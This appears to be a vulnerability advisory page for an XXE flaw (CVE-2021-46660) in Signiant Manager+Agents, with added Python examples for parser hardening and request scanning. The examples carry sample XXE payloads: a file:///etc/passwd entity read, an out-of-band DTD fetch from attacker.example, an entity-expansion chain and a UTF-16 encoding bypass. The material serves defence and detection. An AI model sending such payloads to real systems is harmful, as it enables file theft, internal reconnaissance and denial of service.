CVE-2021-46660
📋 TL;DR
Signiant Manager+Agents before version 15.1 processes attacker-supplied XML with external entity resolution enabled, so a crafted document can trigger an XML External Entity (XXE) attack. Depending on the parser and host configuration this allows reading local files, reaching internal services from the Manager host (server-side request forgery), or exhausting the parser (denial of service). Any deployment running a version earlier than 15.1 is affected.
💻 Affected Systems
- Signiant Manager+Agents
⚠️ Risk & Real-World Impact
Worst Case
Arbitrary file read on the Manager host as the Signiant service account, reconnaissance of the internal network through SSRF from that host, and, only where the parser's runtime exposes a code-executing URI scheme, remote code execution. No such scheme is confirmed for this product, so treat RCE as unverified.
Likely Case
Disclosure of configuration files readable by the Signiant service (which may include stored credentials), enumeration of internal services reachable from the Manager host, and a denial of service from entity expansion.
If Mitigated
With external entity resolution disabled at the parser but DOCTYPE still accepted, what remains is mainly entity-expansion denial of service; network segmentation further limits what an SSRF from the Manager host could reach.
🎯 Exploit Status
XXE payloads are simple to craft, so exploitation complexity is low once an attacker can reach an endpoint that accepts XML; such endpoints are frequently reachable without authentication. The vendor release notes summarized here do not state whether this particular endpoint requires authentication.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 15.1 and later
Vendor Advisory: https://help.signiant.com/flight-deck/general/release-notes-15-1
Restart Required: Yes
Instructions:
1. Download Signiant Manager+Agents version 15.1 or later from official sources.
2. Back up the current configuration.
3. Install the update following the vendor instructions.
4. Restart the Signiant services.
5. Verify functionality.
🔧 Temporary Workarounds
Disable XML External Entity Processing
Applies to: all platforms. Only actionable where you control the parser configuration (your own integration code, or a proxy in front of Signiant); the product's own parser is fixed only by the 15.1 update.
Configure the XML parser with: setFeature("http://xml.org/sax/features/external-general-entities", false); setFeature("http://xml.org/sax/features/external-parameter-entities", false); and, where the parser supports it, setFeature("http://apache.org/xml/features/disallow-doctype-decl", true), which also blocks entity-expansion denial of service because no entities can be declared at all.
Input Validation and Sanitization
Applies to: all platforms. Implement strict input validation for XML data before it reaches the parser.
Validate inbound XML against a schema and reject any document containing a DOCTYPE declaration; decode the request body first (UTF-16 bodies do not contain the byte string "<!DOCTYPE") so the check cannot be bypassed by encoding.
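The following is an added example, not code from this page or from Signiant. It puts the two SAX feature settings quoted above side by side in their weak and hardened forms using Python's standard library (which exposes the same feature URIs as xml.sax.handler.feature_external_ges and feature_external_pes), and adds the stricter option of refusing any DOCTYPE. The canary file, the temporary directory and the payload are constructed by the example; nothing is read from a real system.

```python
"""XXE parser hardening in Python's standard library (added example).

Three parser configurations are compared against one constructed payload:
  parse_weak        external general entities enabled (the XXE primitive)
  parse_hardened    the two SAX features from the workaround set to False
  parse_no_doctype  refuse the document at the DOCTYPE, before any entity
                    can be declared (also stops entity-expansion DoS)
"""
import io
import os
import tempfile
import xml.parsers.expat
import xml.sax
import xml.sax.handler


class _TextCollector(xml.sax.handler.ContentHandler):
    """Gathers character data so we can see whether entity content leaked."""

    def __init__(self):
        super().__init__()
        self.text = ""

    def characters(self, content):
        self.text += content


def _sax_parse(xml_bytes: bytes, external_ges: bool) -> str:
    parser = xml.sax.make_parser()
    # Same feature URIs as in the workaround text:
    #   feature_external_ges = ".../external-general-entities"
    #   feature_external_pes = ".../external-parameter-entities"
    parser.setFeature(xml.sax.handler.feature_external_ges, external_ges)
    parser.setFeature(xml.sax.handler.feature_external_pes, False)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return collector.text


def parse_weak(xml_bytes: bytes) -> str:
    """Weak setting: the external entity is fetched and inlined into the text."""
    return _sax_parse(xml_bytes, external_ges=True)


def parse_hardened(xml_bytes: bytes) -> str:
    """Workaround setting: the external entity is skipped, nothing is read."""
    return _sax_parse(xml_bytes, external_ges=False)


class DoctypeRejected(ValueError):
    """Raised when a document carries a DOCTYPE and so may declare entities."""


def parse_no_doctype(xml_bytes: bytes) -> list:
    """Strictest setting: abort on the DOCTYPE itself.
    Returns the element names seen, in document order."""
    names = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected("DOCTYPE %r refused (SYSTEM id %r)" % (name, sysid))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(xml_bytes, True)
    return names


def xxe_payload(path: str) -> bytes:
    """Constructed XXE payload whose entity points at a local file; a file://
    URI resolves the same way through xml.sax's default EntityResolver."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE job [ <!ENTITY xxe SYSTEM "%s"> ]>\n'
        '<job><name>&xxe;</name></job>' % path
    ).encode()


def demo() -> dict:
    """Plant a canary file, feed the payload to each parser, report what leaked."""
    with tempfile.TemporaryDirectory() as tmp:
        canary = os.path.join(tmp, "canary.txt")
        with open(canary, "w") as fh:
            fh.write("CANARY-5e1f")
        payload = xxe_payload(canary)
        results = {"weak": parse_weak(payload),
                   "hardened": parse_hardened(payload)}
        try:
            parse_no_doctype(payload)
            results["no_doctype"] = "accepted"
        except DoctypeRejected as exc:
            results["no_doctype"] = "rejected: %s" % exc
    return results


if __name__ == "__main__":
    for mode, outcome in demo().items():
        print("%-10s -> %r" % (mode, outcome))
```

Running it shows the canary string inside the weak parser's output and absent from the hardened one, while the DOCTYPE-rejecting parser never reaches the entity at all. Prefer the last form wherever your integration does not need DTDs: it is the only one of the three that also removes entity-expansion denial of service.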
🧯 If You Can't Patch
- Implement network segmentation so the Signiant Manager host cannot reach sensitive internal networks or arbitrary external hosts; this limits what an SSRF through XXE can enumerate or exfiltrate to
- Deploy a web application firewall (WAF) with XXE rules that match "<!DOCTYPE" and "<!ENTITY" in request bodies, and confirm the WAF normalizes body encodings first, since a UTF-16 body bypasses a byte-level string match
🔍 How to Verify
Check if Vulnerable:
Read the installed version from the Signiant Manager web interface or its configuration files. Any version before 15.1 is vulnerable.
Verify Fix Applied:
Confirm the version is 15.1 or later, then submit a harmless XML document to an XML-accepting endpoint that declares an external entity pointing at a host you control (an HTTP listener or a DNS name whose lookups are logged). A patched system produces no callback. Do not use payloads that read real files on production systems.
📡 Detection & Monitoring
Log Indicators:
- Unusual XML parsing errors
- Large XML file uploads
- Requests containing DOCTYPE declarations
Network Indicators:
- HTTP requests with XML content containing external entity references
- Outbound connections from the Signiant Manager host to unexpected internal or external destinations, especially shortly after an inbound XML request
SIEM Query:
source="signiant" AND (message="*DOCTYPE*" OR message="*ENTITY*" OR message="*XML parsing error*")
This is a substring match, so legitimate XML that carries a DOCTYPE will also hit; baseline normal traffic first, then alert on ENTITY declarations with SYSTEM or PUBLIC identifiers, which are rare in legitimate documents and are the ones that can read files or reach the network.
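The following is an added example, not code from this page or from Signiant, showing the log and network indicators above as detection logic run over captured request bodies. It flags DOCTYPE declarations, external (SYSTEM/PUBLIC) entities, parameter entities and entity-expansion chains, and it decodes UTF-16 bodies first so the byte-level evasion noted under the WAF mitigation does not slip past. The sample request bodies and the host attacker.example are constructed for this example.

```python
r"""XXE indicator scan over captured request bodies (added example).

classify() returns the indicators found in one body plus a severity;
scan() runs it over a batch. Bodies are decoded before matching, because a
rule for "<!DOCTYPE" never sees "<\x00!\x00D\x00..." in a UTF-16 request.
"""
import re

_LIT = '"[^"]*"|' "'[^']*'"  # a quoted literal (system id, public id or value)
DOCTYPE_RE = re.compile(
    r"<!DOCTYPE\s+[\w.:\-]+(?:\s+(?:SYSTEM\s+(?P<sys>%s)"
    r"|PUBLIC\s+(?:%s)\s+(?P<pubsys>%s)))?" % (_LIT, _LIT, _LIT),
    re.IGNORECASE)
ENTITY_RE = re.compile(
    r"<!ENTITY\s+(?P<pe>%%\s*)?(?P<name>[\w.:\-]+)\s+"
    r"(?:SYSTEM\s+(?P<sys>%s)|PUBLIC\s+(?:%s)\s+(?P<pubsys>%s)|(?P<value>%s))"
    % (_LIT, _LIT, _LIT, _LIT),
    re.IGNORECASE)
ENTITY_REF_RE = re.compile(r"[&%][\w.:\-]+;")  # &name; or %name; inside a value


def decode_body(raw: bytes) -> str:
    """Normalise the body to text; UTF-16 with or without a BOM is recognised."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return raw.decode("utf-16")
    if raw.startswith(b"\xef\xbb\xbf"):
        return raw.decode("utf-8-sig")
    if raw.startswith(b"<\x00"):
        return raw.decode("utf-16-le")
    if raw.startswith(b"\x00<"):
        return raw.decode("utf-16-be")
    return raw.decode("utf-8", errors="replace")


def classify(raw: bytes) -> dict:
    """Return the XXE indicators found in one request body plus a severity."""
    text = decode_body(raw)
    f = {"doctype": False, "doctype_sysid": None, "external_entities": [],
         "parameter_entities": False, "expansion_risk": False}
    m = DOCTYPE_RE.search(text)
    if m:
        f["doctype"] = True
        lit = m.group("sys") or m.group("pubsys")
        f["doctype_sysid"] = lit[1:-1] if lit else None  # external DTD fetch
    for e in ENTITY_RE.finditer(text):
        if e.group("pe"):
            f["parameter_entities"] = True
        lit = e.group("sys") or e.group("pubsys")
        if lit:
            f["external_entities"].append(lit[1:-1])
        elif ENTITY_REF_RE.search(e.group("value")):
            # internal entity that expands to other entities: billion-laughs shape
            f["expansion_risk"] = True
    f["severity"] = _severity(f)
    return f


def _severity(f: dict) -> str:
    if f["external_entities"]:
        return "high"    # file read / SSRF primitive
    if f["parameter_entities"] or f["doctype_sysid"] or f["expansion_risk"]:
        return "medium"  # external DTD fetch or expansion DoS
    return "low" if f["doctype"] else "none"


# Constructed sample bodies, one per indicator class.
_FILE_READ = (b'<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM '
              b'"file:///etc/passwd">]><r>&xxe;</r>')
SAMPLE_REQUESTS = {
    "req-benign": b'<?xml version="1.0"?><job><name>ingest</name></job>',
    "req-file-read": _FILE_READ,
    "req-oob-param": (b'<!DOCTYPE r [<!ENTITY % dtd SYSTEM '
                      b'"http://attacker.example/x.dtd"> %dtd;]><r/>'),
    "req-billion-laughs": (b'<!DOCTYPE r [<!ENTITY a "aaaa">'
                           b'<!ENTITY b "&a;&a;&a;&a;">]><r>&b;</r>'),
    "req-external-dtd": b'<!DOCTYPE job SYSTEM "job.dtd"><job/>',
    # same payload as req-file-read, sent as UTF-16LE without a BOM
    "req-utf16": _FILE_READ.decode().encode("utf-16-le"),
}


def scan(requests: dict) -> dict:
    """Map each request id to its severity, dropping clean bodies."""
    out = {}
    for rid, body in requests.items():
        sev = classify(body)["severity"]
        if sev != "none":
            out[rid] = sev
    return out


if __name__ == "__main__":
    for rid, sev in scan(SAMPLE_REQUESTS).items():
        print("%-20s %s" % (rid, sev))
```

The decoder mirrors what the target parser would do with the body; if the endpoint accepts other encodings, extend decode_body accordingly, since a scanner that decodes less than the parser is exactly the gap an attacker uses.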